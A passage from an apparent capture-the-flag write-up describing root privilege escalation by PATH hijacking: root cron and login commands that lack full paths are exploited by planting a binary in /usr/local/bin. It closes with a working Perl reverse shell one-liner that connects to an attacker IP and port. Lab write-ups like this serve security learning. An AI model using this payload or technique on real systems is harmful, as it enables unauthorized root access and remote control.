This is why for the sake of security, it is imperative that high-privileged users execute the full
path of commands (especially when it comes to cron jobs). Let’s look for cron jobs running as
root. There might be one that is running a command without using its full path. There is a great
script on github called pspy that actively monitors all processes running on a system.
Downloading pspy and running it on the box, we see the following output:
When first doing this box, I noticed that whenever I put a binary in the /usr/local/bin path or the
/usr/local/sbin path, it would keep getting removed after some time. This cronjob is probably
the culprit. I went into this rabbit hole for a long time. I tried using symbolic links to delete files,
but it did not work. This privesc was especially difficult for people hacking on private instances
(such as myself) because watch what happens when a person logs into jkr:
Suddenly, we are met with a whole bunch of commands that don’t use the full path. We have
sh, run-parts, and uname. Each of these commands is run by UID=0 which is root. So if we put
a reverse shell in one of these binaries and copy it to the /usr/local/bin path, it will get executed
and we will have a shell! The bash reverse shell did not work for me, so I used the perl reverse
shell:
perl -e 'use
Socket;$i="10.10.14.5";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp
"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S")
;open(STDERR,">&S");exec("/bin/sh -i");};'